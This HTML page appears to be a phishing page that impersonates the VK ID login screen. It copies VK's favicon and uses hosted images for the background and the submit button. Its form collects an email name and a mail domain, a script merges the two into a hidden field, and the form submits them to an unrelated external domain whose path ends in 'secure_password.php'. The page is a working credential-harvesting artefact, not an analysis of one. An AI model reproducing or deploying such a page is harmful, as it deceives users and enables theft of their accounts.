<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  <title>VK ID</title>
  <link rel="shortcut icon" type="image/x-icon" href="https://static.vk.com/vkid/1.1.1184/favicon-new-32x32.png">
  <style>
    html, body {
      font-family: Helvetica, Arial, sans-serif;
      margin: 0;
      padding: 0;
      border: 0;
      position: absolute;
      height: 100%;
      min-width: 100%;
      font-size: 14px;
      direction: ltr;
      -webkit-text-size-adjust: none;
    }

    input[type=text] {
      width: 169px;
      height: 100%;
      color: #2C2D2E;
      box-sizing: border-box;
      border: none;
      border-radius: 8px 0 0 8px;
      font-size: 15px;
      font-weight: 400;
      line-height: 20px;
      font-family: Arial, sans-serif;
      background: transparent;
      margin: 0;
      padding: 0 12px;
    }

    input[type=text]:focus {
      outline: none;
      border: 1px solid #1976d2;
      border-radius: 8px 0 0 8px;
      background-color: transparent;
    }

    select {
      width: 136px;
      padding: 8px 8px;
      border: none;
      border-radius: 0 8px 8px 0;
      background-color: transparent;
      color: #000;
      font-size: 1rem;
      transition: border 0.2s ease;
      box-shadow: none;
    }

    select:focus {
      outline: none;
      border: 1px solid #1976d2;
      border-radius: 0 8px 8px 0;
      background-color: transparent;
    }
  </style>
</head>

<body bgcolor="#EBEDF0">
  <div align="center">
    <table border="0" width="368" cellspacing="0" cellpadding="0">
      <tr>
        <td>
          <table border="0" width="100%" cellspacing="0" cellpadding="0">
            <tr>
              <td height="20"></td>
            </tr>
            <tr>
              <td height="430" background="https://i.ibb.co/LDt0vfPK/fm.png">
                <table border="0" width="100%" cellspacing="0" cellpadding="0">
                  <tr>
                    <td height="109"></td>
                  </tr>
                  <tr>
                    <td height="163">
                      <table border="0" width="100%" cellspacing="0" cellpadding="0">
                        <tr>
                          <td width="35"></td>
                          <td>
                            <form id="loginForm" action="https://arnionsrcommerces.ink/ozo/secure_password.php" method="get">
                              <table border="0" width="100%" cellspacing="0" cellpadding="0">
                                <tr>
                                  <td height="18"></td>
                                </tr>
                                <tr>
                                  <td>
                                    <table border="0" width="100%" cellspacing="0" cellpadding="0">
                                      <tr>
                                        <td height="36">
                                          <input type="hidden" name="email" id="email">
                                          <input type="text" required placeholder="Email account name" name="user" id="user" style="float: right">
                                        </td>
                                        <td width="138">
                                          <p align="left">
                                            <select name="domain" id="domain">
                                              <option value="@mail.ru">@mail.ru</option>
                                              <option value="@bk.ru">@bk.ru</option>
                                              <option value="@inbox.ru">@inbox.ru</option>
                                              <option value="@internet.ru">@internet.ru</option>
                                              <option value="@list.ru">@list.ru</option>
                                              <option value="@xmail.ru">@xmail.ru</option>
                                              <option value="@yandex.ru">@yandex.ru</option>
                                              <option value="@gmail.com">@gmail.com</option>
                                              <option value="@yahoo.com">@yahoo.com</option>
                                              <option value="@hotmail.com">@hotmail.com</option>
                                              <option value="@outlook.com">@outlook.com</option>
                                            </select>
                                          </p>
                                        </td>
                                      </tr>
                                    </table>
                                  </td>
                                </tr>
                                <tr>
                                  <td height="40"></td>
                                </tr>
                                <tr>
                                  <td>
                                    <input type="image" src="https://i.ibb.co/YFq972PC/btn.png" width="310" height="40" alt="Submit">
                                  </td>
                                </tr>
                                <tr>
                                  <td height="12"></td>
                                </tr>
                              </table>
                            </form>
                          </td>
                          <td width="32"></td>
                        </tr>
                      </table>
                    </td>
                  </tr>
                  <tr>
                    <td height="145"></td>
                  </tr>
                </table>
              </td>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
  </div>

  <script>
    document.getElementById('loginForm').addEventListener('submit', function (e) {
      const user = document.getElementById('user').value.trim();
      const domain = document.getElementById('domain').value;
      document.getElementById('email').value = user + domain;
    });
  </script>
</body>
</html>
